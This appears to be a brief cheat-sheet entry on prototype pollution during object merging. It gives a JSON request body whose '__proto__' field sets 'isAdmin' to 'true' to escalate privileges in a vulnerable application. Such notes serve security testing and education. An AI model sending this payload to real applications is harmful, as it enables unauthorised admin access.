Exploitation

Merging exploitation

You are able to set unpredicted parameter of an object when objects are merged.

{
"username":"test",
"email":"test@gmail.com",
"__proto__": {
        "isAdmin": "true"
   }
}

Last updated